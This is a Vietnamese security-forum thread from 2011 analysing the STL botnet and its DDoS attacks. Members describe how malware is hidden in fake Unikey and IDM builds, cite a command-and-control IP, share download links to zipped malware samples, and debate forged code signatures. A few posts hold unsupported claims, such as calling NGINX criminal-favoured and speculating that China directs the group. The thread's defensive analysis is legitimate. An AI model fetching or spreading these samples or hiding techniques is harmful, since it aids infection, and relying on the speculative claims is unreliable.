100%, như chính chúng ta. Chỉ có tổ chức lãnh đạo, trả lương và điều khiển, hướng dẫn KT cho họ là các bác TQ thôi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

mylove14129 — GMT

Vấn đề chính trị là một vấn đề vô cùng nhạy cảm. Bác Tàu thì vốn nổi tiếng với những trò thâm độc. @PXMMRF : Phân tích của a e thấy rất hợp lý, quả thật từ đầu tới giờ hình như rất nhiều người đang theo dõi topic này đều có một suy nghĩ " những người tấn công các trang web lề trái thì ắt phải là những người thuộc lề phải" nhưng xét về phương diện của cả một quốc gia( về mặt khả năng, tiềm lực ,...), giữa các quốc gia với nhau thì có thể sẽ nhìn thông suốt hơn về vấn đề này. @All : STL không phải là những coder nhãi nhép, vr của họ cũng không phải là những con vr tầm thường, họ là một tổ chức chặt chẽ. Đừng nên coi thường khả năng coder của họ tuy nhiên cũng không nên sợ họ. Còn có a TQN, PXMMRF, Conmale,... sẽ đứng ra vạch mặt họ. Chúc các a thành công.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

PXMMRF wrote:

Đó cũng là những câu hỏi mà tôi luôn trăn trở. Nay tình hình đã sáng ra, thông qua các phân tích của HVA vừa qua. "Trung tâm an ninh mạng" chỉ là một đơn vị hoạt đông theo kiểu hành chính. Biên chế của họ ít, nên không thể làm được các việc quan trọng, đòi hỏi nhiều công sức. Họ làm được gì, thì ta đã thấy.

Hè hè, còn HVA của mình thì sao anh? HVA mình chỉ có "biên chế" tiền túi và thời gian cá nhân bỏ ra mà thôi :P . Biên chế của mấy anh em HVA còn eo hẹp thua "trung tâm an ninh mạng" cả trăm lần nhưng cho đến nay, HVA đã làm những gì? Điều này anh em nào công tâm nhìn vô cũng thấy. Em không có ý trách "trung tâm an ninh mạng" và cũng chẳng có ý so sánh. Em chỉ muốn nói rằng, nếu muốn làm thì đã làm được và làm xong rồi.

PXMMRF wrote:

Còn các bác ở vietnamnet có vẻ đang lúng túng. Chuyển từ báo in sang báo mạng, họ găp nhiều khó khăn và có thể vẫn làm việc theo cơ chế cũ kỹ. Ban Tổng biên tập của họ dường như không co các chuyên gia tầm cỡ về IT để có thể chỉ đạo và đưa ra các chính sách kỹ thuật, bảo mật hơp lý. Vietnamnet tăng trưởng quá nhanh, nhưng lại không cân đối với trình độ và năng lưc quản lý mạng, IT, vốn còn lạc hậu, không theo kip. Họ quản lý rất nhiều IP tĩnh nhưng việc bố trí các website và sử dụng khối IP đó một cách hợp lý thì lại đang có vấn đề. Khi bị tấn công DDoS, thay vì họ phải bố trí lại kết cấu hạ tầng mạng một cách hợp lý hơn, thì họ lai đưa các web server NGINX vào để thay thế Apache, hay làm một chốt chặn đầu vào, trong khi NGINX có một lỗi chết người là lỗi buffer overflow liên quan đến khả năng lọc input data của nó khá kém và hay có lỗi. Một số chuyên gia quốc tế nói là NGINX thường chỉ được các tổ chức tội phạm ưa dùng vì có thể "đánh nhanh rút nhanh". Với khả năng tài chính dồi dào, vietnamnet hoàn toàn có thể nhờ AkamaiTechnologies hỗ trợ và quản lý hệ thống để loại trừ tác hai của DDoS, như nhiều công ty lớn hay rất lớn của Mỹ đã nhờ, nhưng họ lại chưa làm. Không rõ tai sao... vân vân.

Theo em khảo sát (và theo một số thông tin nội bộ), vietnamnet có đủ kinh phí để kiện toàn một hệ thống báo chí mạng có bài bản và vững vàng. Tuy nhiên, chuyện ở đây không phải là chuyện phê bình hay đánh giá khía cạnh kỹ thuật IT của vietnamnet mà là chuyện vietnamnet bị đánh triền miên nhưng chính trên trang vietnamnet cũng đưa tin qua loa. Ngay trên trang thanhnien còn đưa tin là "vietnamnet bị đánh nhẹ" :P . Tại sao? Đầu năm 2010 và lần này, vietnamnet không hề bị "đánh nhẹ". Nếu cho rằng botnet đánh HVA ngang ngửa botnet đánh vietnamnet thì em tin rằng ở thời điểm cao độ, vietnamnet đón nhận ít nhất là 500Mbit DDoS chớ không ít hơn. Đây không thể được xem là nhẹ. Nếu vietnamnet không muốn tuyên bố chính thức (vì lý do nào đó) thì đó là quyền của họ nhưng điều này không có nghĩa rằng thực tế sự việc là "nhẹ" bởi vì anh em ta là dân kỹ thuật, anh em ta không thể chấp nhận những điều không đúng thực tế.

PXMMRF wrote:

Cũng có một điều là các công ty, xí nghiệp, tổ chức của VN thường có bệnh thành tích. Và vì vậy họ thường giấu kín các khuyết điểm, không muốn nói ra các khó khăn. Sơ bị trên đánh giá là thiếu năng lưc hoan thành nhiệm vụ.... Mà có nhờ ai, thì họ phải tìm những cơ quan lớn, cơ quan cấp trên (như Bộ Khoa học công nghệ chẳng hạn). Ai lai nhờ HVA, sợ mang tiếng. Thế đấy. Hi hì.

Đây là chuyện nhức nhối và đây là chuyện cần phải thay đổi tận gốc. Như em đã có lần nhận xét rằng, những vết thương ung mủ không chịu chữa trị thì dần dần sẽ dẫn đến hoại thư cho cả một cơ thể là vậy. Bịnh thành tích là hội chứng của sự mặc cảm, sự sợ hãi sự thật và thói quen che đậy. Những căn bịnh này dần dần sẽ huỷ hoại sự thật, huỷ hoại đức tính trung thực, huỷ hoại lòng dũng cảm đối diện với thiếu sót để thay đổi và phát triển. Đây không phải là chuyện đùa nữa rồi.

PXMMRF wrote:

Tôi cũng nghĩ là các thành viên STL là người VN 100%, như chính chúng ta. Chỉ có tổ chức lãnh đạo, trả lương và điều khiển, hướng dẫn KT cho họ là các bác TQ thôi.

Cho đến nay, em chưa tìm ra bất cứ một giềng mối nào chứng minh có sự liên can đến tổ chức lãnh đạo của stl là các bác TQ. Theo em thấy, đây cũng chỉ là speculation thôi chớ chưa có gì chắc chắn hết. Nếu em có tư cách pháp nhân như đại diện của một tổ chức chính thức của nhà nước (như vncert hoặc bộ viễn thông chẳng hạn) thì em thừa sức truy ra nguồn gốc lãnh đạo của stl là ai.

Phân tích tính chất vài trận DDoS HVA vừa qua.

chieutuongtu — GMT

bolzano_1989 wrote:

Cụ thể là bạn scan và gửi 3 log Autoruns, Autorunsc (Autoruns command-line) và TCPView cho mình theo đúng hướng dẫn ở các bài viết sau: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/ Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/ Hướng dẫn scan và gửi log TCPView http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-log-tcpview/

Em gởi anh các file theo hướng dẫn a gởi. http://www.mediafire.com/?ua2xhwjvhxuz8w9 Tuy nhiên có bước thứ 2, e tạo file Autorunsc.bat - Copy vào thư mục chứa autorunsc.exe - sau đó chạy file .bat thì nó chạy như hình (e add trong file rar đã dẫn link ở trên) sau đó nó tự đóng lại mà k tạo ra 2 file log autorunsc_result.txt và autorunsc_result.csv như anh nói. PS: cái còm e gởi hồi trưa là lúc đang ở trường. Lúc làm cái này e lại đang ở nhà và e lại vào blogspot bình thường. Hik

Phân tích tính chất vài trận DDoS HVA vừa qua.

template — GMT

Không ai giải thích đc dùm tôi tại sao họ lại tấn công vào web lề trái như danlambao?

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn Kể ra up cũng khá nhiều, và hầu hết đã bị Avira chụp hết, ngay cả cái IAStor cũng đã được đưa vào danh sách. Avira số 1, KAV+MS số 2. Bỏ công sức ra viết mail cũng đáng.

Phân tích tính chất vài trận DDoS HVA vừa qua.

weasel1026789 — GMT

Mình có thắc mắc là sau khi diệt xong hết bot của STL thì phải mất bao lâu chúng mới có lại 1 botnet mới?

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

chieutuongtu wrote:

bolzano_1989 wrote:

Cụ thể là bạn scan và gửi 3 log Autoruns, Autorunsc (Autoruns command-line) và TCPView cho mình theo đúng hướng dẫn ở các bài viết sau: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/ Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/ Hướng dẫn scan và gửi log TCPView http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-log-tcpview/
Em gởi anh các file theo hướng dẫn a gởi. http://www.mediafire.com/?ua2xhwjvhxuz8w9 Tuy nhiên có bước thứ 2, e tạo file Autorunsc.bat - Copy vào thư mục chứa autorunsc.exe - sau đó chạy file .bat thì nó chạy như hình (e add trong file rar đã dẫn link ở trên) sau đó nó tự đóng lại mà k tạo ra 2 file log autorunsc_result.txt và autorunsc_result.csv như anh nói. PS: cái còm e gởi hồi trưa là lúc đang ở trường. Lúc làm cái này e lại đang ở nhà và e lại vào blogspot bình thường. Hik

Bạn đã tạo file Autorunsc.bat có nội dung không đúng với hướng dẫn rồi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

weasel1026789 wrote:

Mình có thắc mắc là sau khi diệt xong hết bot của STL thì phải mất bao lâu chúng mới có lại 1 botnet mới?

Theo tớ thấy, với tình hình xài đồ crackz, xài warez và ý thức về vấn đề bảo mật thông tin của người dùng còn quá kém như hiện tại thì việc hình thành một botnet có lẽ chỉ mất vài tuần hoặc chậm lắm là vài tháng.

Phân tích tính chất vài trận DDoS HVA vừa qua.

crc32 — GMT

Tin buồn cho stl là AVAST! cũng vừa mới chộp cổ mớ malwares trong iTunes.rar.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Đi đâu cũng gặp Internet Download Manager và Unikey. Chỉ cầy cài cắm malware vào 2 app này là đủ rồi. Bà con nào đang dùng IDM crack + Unikey download tùm lum trên mạng về làm ơn remove, delete, kill, uninstall ngay. Nếu dùng Firefox như tôi thì dùng cái Addon DownThemAll cũng rất tốt rồi. Cậu chieutuongtu làm ơn xoá giùm 2 soft trên: IDM: c:\program files (x86)\internet download manager\idman.exe Unikey: e:\softwares\linh tinh\unikey40rc2-1101-win64\unikeynt.exe: Ông này là virus thứ thiệt, tôi đã từng phân tích nó. Cậu tìm, zip lại và up lên mediafire các file sau: 1. c:\users\minh dtu\appdata\local\google\update\googleupdate.exe 2. c:\program files (x86)\dell datasafe local backup\components\scheduler\launcher.exe 3. c:\program files (x86)\common files\adobe\switchboard\switchboard.exe 4. c:\program files (x86)\quicktime\qttask.exe 5. c:\program files (x86)\poweriso\pwrisovm.exe 6. c:\program files (x86)\common files\nokia\mplatform\nokiamserver.exe 7. c:\program files (x86)\dell webcam\dell webcam central\webcamdell2.exe 8. c:\program files (x86)\internet download manager\idman.exe Trong đám này, có 3 file nghi ngờ nhất là googleupdate.exe, switchboard.exe, idman.exe. Hầu như log AutoRuns nào tôi cũng thấy. PS: Ngày hôm qua tình cờ đọc một bài viết của đám 29A public trên mạng, tụi nó đã có thể extract digital signature từ 1 file sạch và ghép vào 1 file malware của tụi nó. Thằng Nga này còn cung cấp source C + exe luôn. Bởi vậy, không tin cái gì được cả. Thời buổi đão lộn !

Phân tích tính chất vài trận DDoS HVA vừa qua.

tranvanminh — GMT

TQN wrote:

PS: Ngày hôm qua tình cờ đọc một bài viết của đám 29A public trên mạng, tụi nó đã có thể extract digital signature từ 1 file sạch và ghép vào 1 file malware của tụi nó. Thằng Nga này còn cung cấp source C + exe luôn. Bởi vậy, không tin cái gì được cả. Thời buổi đão lộn !

Sáng nay em cũng vừa đọc báo thấy tin này, ghê quá là ghê.

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

crc32 wrote:

Tin buồn cho stl là AVAST! cũng vừa mới chộp cổ mớ malwares trong iTunes.rar.

Nó chộp iTunesHelper.exe từ sáng sớm hôm qua (30-8-2011), khi tôi thử nghiệm lai quá trình DDoS vào mục tiêu. Bây giờ muốn thử nghiệm một số bot-DDoS tool của STL phải "chiều" chúng như "chiều vong". Phải disable Antivir guard, có lúc phải disable cả Avira, hạ hết Firewall, cẩn thận disable cả McAfee on-access scan, disable cả các chương trình dự đoán có thể conflict với nó....để STL bot có thể nhiễm được vào máy của mình. Hì hì

TQN wrote:

http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn Kể ra up cũng khá nhiều, và hầu hết đã bị Avira chụp hết, ngay cả cái IAStor cũng đã được đưa vào danh sách. Avira số 1, KAV+MS số 2. Bỏ công sức ra viết mail cũng đáng.

Cho đến sáng nay (31.8.2011-9.00AM) Avira vẫn chưa detect đươc các files trong "IAStore_26_08_2011.zip" (gồm 5 file .dll và 1 file .exe sau khi extracted) là virus, TQN ạ!

Phân tích tính chất vài trận DDoS HVA vừa qua.

LeVuHoang — GMT

TQN wrote:

PS: Ngày hôm qua tình cờ đọc một bài viết của đám 29A public trên mạng, tụi nó đã có thể extract digital signature từ 1 file sạch và ghép vào 1 file malware của tụi nó. Thằng Nga này còn cung cấp source C + exe luôn.

Anh có link về cái public article này không anh? Nếu quả thực như vậy thì chẳng biết tin vào thằng nào nữa. #:S

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

PXMMRF wrote:

Cho đến sáng nay (31.8.2011-9.00AM) Avira vẫn chưa detect đươc các files trong "IAStore_26_08_2011.zip" (gồm 5 file .dll và 1 file .exe sau khi extracted) là virus, TQN ạ!

Chắc chưa đưa lên database để bà con update về thôi. Thực ra lần đầu (hôm 26-08-2011) gửi cho Avira thì họ bảo đây là các file SẠCH. Em dịch nguyên bài của anh TQN phân tích mấy cơ chế của IAStor..(s) gửi cho họ :D , họ trả lời ngay là: "Dear Sir or Madam, Thank you for your mail. Sorry for the mistake. The files sent to us were analyzed by the virus lab and could be classified as malware. The detection and repair of the malware sample will be available with one of the next VDF versions. -- Freundliche Gruesse / Best regards Avira Operations GmbH & Co. KG Roland Staufert Professional Support & Services Avira Operations GmbH & Co. KG Kaplaneiweg 1, D-88069 Tettnang, Germany Internet: http://www.avira.com" Thanks TQN.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Tới nay, tôi đã biết và RCE 3 cách cài cắm malware vào Unikey trôi nổi trên mạng: 1. Dùng overlay data, gắn vào đuôi file fake Unikey: Overlay data này bắt đầu = string "NullsoftInst" mà các bạn đã biết trong post trước. Tôi cũng đã post 010 Editor script để extract và decrypt các malwares đó ra. File DecodeBin.1sc. 2. Dùng các Bmp resource giả nhúng vào resource của file fake Unikey: Cách mà MSHelpCenter.exe được sinh ra. Các bitmap resource này có tên sau: - Background10311 - Pattern2066 - Pattern5230 - Background10252 - Pattern1034 3. Cũng dùng resource, nhưng nhúng vào RCDATA, với name 1, 2, 3, 4, 5, 6. Đây là fake Unikey64 mà cậu chieutuongtu đang dính. 010 Editor script để giãi mã cho đám này tôi cũng đã post lên, file DecodeRes.1sc. Các 010 Editor script đó nằm trong file zip DecodeSTLVirus.zip mà tôi đã up ở Mediafire. Để khảo sát resource của 1 EXE, DLL... (nói chung là PE file), các bạn có thể down và dùng tool này: Resource Hacker, free, good http://angusj.com/resourcehacker/ BackupSvc.* và MSHelpCenter.* đều được sinh ra từ 3 cách này. Trong thư mục STLVirus mà tui đã up lên Mediafire: http://www.mediafire.com/#tz745o0f678w8, các bạn sẽ thấy 3 file fake Unikey này.

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

face digi sig năm 2010 đã được cảnh báo rồi đây là face digi sig của Avira

Phân tích tính chất vài trận DDoS HVA vừa qua.

LeVuHoang — GMT

mv1098 wrote:

face digi sig năm 2010 đã được cảnh báo rồi đây là face digi sig của Avira

Nếu như những gì thể hiện trong hình của mv1098 thì Signature này bị warning rồi, không đáng kể. Chỉ sợ verify mà không cảnh báo gì thì chịu chết. Theo như mình hiểu nội dung của anh TQN thì dùng cert sạch ký cho 1 binary thành 1 file sạch.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Đúng rồi đó LVH. Dùng cert sạch để sign cho file malware. Cậu chịu khó search đi, kỹ thuật này không nên phổ biến rộng rãi. Thật ra năm 2010 tôi đã đọc một article của một nhân viên của Norton về fake digital signature rồi. Tới giờ tụi VX mới public thôi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

vndncn — GMT

TQN wrote:

Tới nay, tôi đã biết và RCE 3 cách cài cắm malware vào Unikey trôi nổi trên mạng: 1. Dùng overlay data, gắn vào đuôi file fake Unikey: Overlay data này bắt đầu = string "NullsoftInst" mà các bạn đã biết trong post trước. Tôi cũng đã post 010 Editor script để extract và decrypt các malwares đó ra. File DecodeBin.1sc. 2. Dùng các Bmp resource giả nhúng vào resource của file fake Unikey: Cách mà MSHelpCenter.exe được sinh ra. Các bitmap resource này có tên sau: - Background10311 - Pattern2066 - Pattern5230 - Background10252 - Pattern1034 3. Cũng dùng resource, nhưng nhúng vào RCDATA, với name 1, 2, 3, 4, 5, 6. Đây là fake Unikey64 mà cậu chieutuongtu đang dính. 010 Editor script để giãi mã cho đám này tôi cũng đã post lên, file DecodeRes.1sc. Các 010 Editor script đó nằm trong file zip DecodeSTLVirus.zip mà tôi đã up ở Mediafire. Để khảo sát resource của 1 EXE, DLL... (nói chung là PE file), các bạn có thể down và dùng tool này: Resource Hacker, free, good http://angusj.com/resourcehacker/

Hi anh TQN: Nếu bỏ IDM, em tiếc quá anh. Em đang dùng Unikey và IDM này http://www.mediafire.com/?er804a4eltd07ht . Em nhờ anh kiểm tra dùm em xem có bị malware của STL không ạ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Nếu tiếc thì chịu thôi chứ sao vndncn, quyền của em mà, sống chung với đám bot này cũng không sao, chậm mạng, chậm máy một chút thôi ;) Chỉ sợ cái đám StaticCaches.dat lấy hết thông tin rồi up lên thôi :-(

Phân tích tính chất vài trận DDoS HVA vừa qua.

nguoicuachua — GMT

Các anh check hộ cái idm này dùm http://www.mediafire.com/?hb1qgy2yotn1znd

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Check hộ hết thì anh em HVA chết hết, check làm sao nổi. Các bạn cập nhật AVs của các bạn đi, nên install thêm Avira Free hay update Windows Defender, còn KAV/KIS thì phải mua, lại update chậm chạp hơn nên em không khuyên. Cứ IDM và Unikey thì remove, uninstall hết. Unikey thì lên trang chủ Unikey.org mà down, còn bỏ luôn IDM đi, thiếu gì các addon download có sẵn cho các trình duyệt các bạn. Với 010 Editor và Resource Hacker, các bạn có thể tự kiểm tra file Unikey trên máy bạn và down về có phải là Fake Unikey có "bonus" "mèo què" không:

Phân tích tính chất vài trận DDoS HVA vừa qua.

vndncn — GMT

Hi anh TQN: Dạ, sau khi download trên mạng về là em nhờ virustotal scan giùm rồi anh --> Ok, sau đó em dùng MSE scan tiếp -->Ok luôn anh. Vì vừa nghe anh nói IDM em sợ quá, nên em tính nhờ anh kiểm tra lại dùm em. Em biết anh bận nhiều việc, nếu mọi người ai cũng như em nhờ anh kiểm tra giùm chắc chết luôn hử. :-( Em đang dùng firefox, em vừa tải DownThemAll về luôn. Nếu dùng cái mới này Ok, em sẽ remove IDM liền anh. Mình cài 2 chương trình antivirus trên cùng 1 máy có bị xung đột, bị gì không anh? Em đang dùng MSE. Em đang tập dùng 2 phần mềm của anh vừa nói. Tự nhủ với lòng, từ nay trở đi cố gắng không dùng phần mềm crack nữa.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Ừ, cố gắng đừng down các phần mềm crack trôi nổi trên mạng, trên các forum, trên các website chia sẽ file. Biết đâu stl attach "mèo què" vào đấy. Phần mềm càng phổ biến, càng ưa dùng thì càng phải cẩn thận. Cố gắng tìm các phần mềm free, opensource thay thế. Download tại chính trang chủ, cập nhật AV liên tục, dùng các online scanner để quét ngay khi vừa down về.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

Rất nhiều virus của STL khi kiểm tra VirusTotal thì không một antivirus nào phát hiện cả (fully undetected) nên việc dùng VirusTotal để kiểm tra file một cách mù quáng là rất không nên. Đặc biệt cần tránh các bản IDM portable được quảng cáo là đã được crack sẵn (được nhét virus, trojan sẵn mới đúng).

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

Mình có tổng hợp và cập nhật nhiều bài viết về kiến thức và kĩ năng sử dụng máy tính an toàn và bảo mật trong chủ đề ở link sau, mọi người giới thiệu cho người quen đọc và thực hành giùm (đây là phần quan trọng nhất) để giảm tối đa khả năng tiếp tục là nạn nhân của bọn tội phạm mạng này. Kiến thức và kĩ năng sử dụng máy tính an toàn và bảo mật http://support.cmclab.net/vn/tut0rial/kien-thuc-va-ki-nang-su-dung-may-tinh-an-toan-va-bao-mat/

Phân tích tính chất vài trận DDoS HVA vừa qua.

vndncn — GMT

bolzano_1989 wrote:

Rất nhiều virus của STL khi kiểm tra VirusTotal thì không một antivirus nào phát hiện cả (fully undetected) nên việc dùng VirusTotal để kiểm tra file một cách mù quáng là rất không nên. Đặc biệt cần tránh các bản IDM portable được quảng cáo là đã được crack sẵn (được nhét virus, trojan sẵn mới đúng).

Tiêu rồi, sao giống IDM của mình đang dùng quá vậy trời, IDM mình cũng tự crack luôn bolzano_1989 ơi. Cảm ơn bolzano_1989, mình sẽ giới thiệu và gửi link bài viết "Kiến thức và kĩ năng sử dụng máy tính an toàn và bảo mật" cho mọi người trong công ty, trong list yahoo messenger, và facebook của mình luôn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

o.O.o — GMT

PXMMRF wrote:

crc32 wrote:

Tin buồn cho stl là AVAST! cũng vừa mới chộp cổ mớ malwares trong iTunes.rar.
Nó chộp iTunesHelper.exe từ sáng sớm hôm qua (30-8-2011), khi tôi thử nghiệm lai quá trình DDoS vào mục tiêu. Bây giờ muốn thử nghiệm một số bot-DDoS tool của STL phải "chiều" chúng như "chiều vong". Phải disable Antivir guard, có lúc phải disable cả Avira, hạ hết Firewall, cẩn thận disable cả McAfee on-access scan, disable cả các chương trình dự đoán có thể conflict với nó....để STL bot có thể nhiễm được vào máy của mình. Hì hì
TQN wrote:

http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn Kể ra up cũng khá nhiều, và hầu hết đã bị Avira chụp hết, ngay cả cái IAStor cũng đã được đưa vào danh sách. Avira số 1, KAV+MS số 2. Bỏ công sức ra viết mail cũng đáng.

crc32 wrote:

Tin buồn cho stl là AVAST! cũng vừa mới chộp cổ mớ malwares trong iTunes.rar.
Cho đến sáng nay (31.8.2011-9.00AM) Avira vẫn chưa detect đươc các files trong "IAStore_26_08_2011.zip" (gồm 5 file .dll và 1 file .exe sau khi extracted) là virus, TQN ạ!

Ủa sao ngộ vậy ta, em sử dụng Avast 6 up date mới nhất sao không detect được "IAStore_26_08_2011.zip" (gồm 5 file .dll và 1 file .exe sau khi extracted) là virus Sau khi giải nén và scan thì nó im ru luôn?

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

TQN wrote:

PS: Ngày hôm qua tình cờ đọc một bài viết của đám 29A public trên mạng, tụi nó đã có thể extract digital signature từ 1 file sạch và ghép vào 1 file malware của tụi nó. Thằng Nga này còn cung cấp source C + exe luôn. Bởi vậy, không tin cái gì được cả. Thời buổi đão lộn !

Em nghĩ việc qua mặt việc kiểm tra digital signature này chỉ có thể thực hiện được một khi malware đã được thực thi, có phải đúng như vậy không anh :) ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Không em, tụi virus writer sau khi compile, build ra file virus, malware thì sẽ dùng tool đó để attach good digital signature vào file virus, malware, không cần chính virus, malware đó được run.

Phân tích tính chất vài trận DDoS HVA vừa qua.

secmask — GMT

Em tưởng mấy tool verify digital signature nó phải checksum cả image nữa chứ nhỉ, chứ kiểm tra mỗi cái phần thẻ digital sig không thì dính đòn cũng phải.

Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 — GMT

Đúng rồi, quá trình sign file pe bao giờ cũng phải có cert chứa private key (thường là RSA > 1024 bits), và SHA or MD5 của file được dùng làm hash. Làm sao mà trích xuất nội dung chữ kí từ một file sạch đem attach vào file malware mà vẫn verified được nhỉ ? Nếu được thì các công ty cung cấp chữ kí số còn tồn tại làm gì nữa !. Hôm nay hay một vài hôm trước, một công ty cung cấp chữ kí số vừa bị hack và mất một loạt các certs (giống với vụ đã xảy ra với Comodo từ hồi tháng 5 vừa rồi). Việc các hacker ăn cắp được các chữ kí số là rất nguy hiểm, điển hình như vụ Stuxnet. Code:

http://www.theregister.co.uk/2011/08/30/google_chrome_certificate_blacklist/

Phân tích tính chất vài trận DDoS HVA vừa qua.

cino — GMT

Nếu không có private key thì không thể sign được chữ ký đúng, private key là do CA nắm giữ. Khi đem extract digital signature từ 1 file "sạch" thì chỉ gom được thông tin của thằng chủ và public key của nó mà thôi. Việc virus maker tự ký lại file malware thì dĩ nhiên là khả thi, nhưng chữ kí (lại) đó sẽ không được trust bởi CA.

Em tưởng mấy tool verify digital signature nó phải checksum cả image nữa chứ nhỉ, chứ kiểm tra mỗi cái phần thẻ digital sig không thì dính đòn cũng phải.

Digital signature đính trên file nào thì sẽ dựa trên one-way hash của file đó để verify. Ví dụ, Microsoft cần kí lên file iexplore.exe, họ sẽ one-way hash file đó thành M, và dùng private key (K) của mình (do CA cung cấp) để mã hoá M thành D, D chính là chữ kí số sẽ đính kèm theo iexplore.exe để xác nhận chủ nhân của nó là Microsoft.Code:

D = Digest[M, K]

Khi bác muốn kiểm tra iexplore.exe của mình có phải do Microsoft kí hay không, bác dùng Public key (P) dựa trên certificate từ trusted CA đã nói để giải mã cái D đính kèm ở trên (là chữ kí số của IE) thành M', nếu M' có kết quả giống với one-way hash của iexplore.exe đang sử dụng thì chữ kí đó được tin cậy. Mọi thông tin về thuật toán one-way hash, chủ sở hữu, public key, thời gian hiệu lực... đều gói trong một giấy chứng nhận gọi là digital certificate sở hữu bởi một CA hợp pháp. (Dĩ nhiên bác cũng có thể tạo được giấy chứng nhận của riêng mình, nhưng sẽ chẳng ai tin bác là đứa nào hết)

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

TQN wrote:

Không em, tụi virus writer sau khi compile, build ra file virus, malware thì sẽ dùng tool đó để attach good digital signature vào file virus, malware, không cần chính virus, malware đó được run.

Vậy vấn đề ở đây nằm ở các tool verify code signature rồi, không rõ hiện những tool verify code signature nào có thể bị qua mặt bởi cái tool attach good digital signature kia vậy anh?

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

Theo em được biết thì con Stuxnet được signed by Realtek

Phân tích tính chất vài trận DDoS HVA vừa qua.

vd_ — GMT

@mv1098 Việc stuxnet có được private key của Realtek chưa ai dám truy xét thêm vì ai cũng đoán là việc làm của những tổ chức không nên đụng vào :) Biết đâu Realtek tự nguyện dâng private key :) ( xem thêm http://www.wired.com/threatlevel/2011/07/how-digital-detectives-deciphered-stuxnet/all/1 ) Tui đồng ý với ý kiến của cino, trừ phi có private key, không thì không thể sign một binary mà kiểm tra trust chain thấy valid được. Việc có private key thì có thể thông qua việc hack root CA (ví dụ DigitNoTar.nl gần đây, hoặc Comodo trước đó) để tạo ra chứng chỉ số và sign vào chứng chỉ số đó. @TQN rất cảm ơn anh về nỗ lực làm trong sạch môi trường IT Việt nam.

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

Có thông tin mới là Google cũng mới bị mất digital certificate http://vn.news.yahoo.com/ch%E1%BB%A9ng-ch%E1%BB%89-s%E1%BB%91-c%E1%BB%A7a-google-l%E1%BB%8Dt-v%C3%A0o-tay-072614132.html @vd_ nhìn vào hình thì thấy được app đc sign ở Nga hoặc mấy nước LX cũ, mà báo chí nói do US làm. Cái này mình cũng chỉ là suy luận thôi

Phân tích tính chất vài trận DDoS HVA vừa qua.

TMT102 — GMT

Phân tích tính chất vài trận DDoS HVA vừa qua.

Sherlockok — GMT

Vừa thấy comodo báo trong máy có thằng iastordatamgrsvc.exe connect tới ip 119.153.92.110 . Đây có phải malware đã nêu không ạ ? Có cần mình upload lên không ? Cám ơn!

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

Sherlockok wrote:

Vừa thấy comodo báo trong máy có thằng iastordatamgrsvc.exe connect tới ip 119.153.92.110 . Đây có phải malware đã nêu không ạ ? Có cần mình upload lên không ? Cám ơn!

Virus chắc chắn đó bạn ơi, IP kia ở tận PESHAWAR, PAKISTAN. Bạn cứ upload file lên đi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

Sherlockok — GMT

bolzano_1989 wrote:

Sherlockok wrote:

Vừa thấy comodo báo trong máy có thằng iastordatamgrsvc.exe connect tới ip 119.153.92.110 . Đây có phải malware đã nêu không ạ ? Có cần mình upload lên không ? Cám ơn!
Virus chắc chắn đó bạn ơi, IP kia ở tận PESHAWAR, PAKISTAN. Bạn cứ upload file lên đi.

http://www.mediafire.com/?aezh4rtiubv476k http://www.mediafire.com/?dt4j25v4953w46f http://www.mediafire.com/?q7l5ihx8x7t03nl http://www.mediafire.com/?g112gycu83jz339 http://www.mediafire.com/?d42pd48l3ekidqb http://www.mediafire.com/?1p92q8ww04trxuh

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

TMT102 wrote:

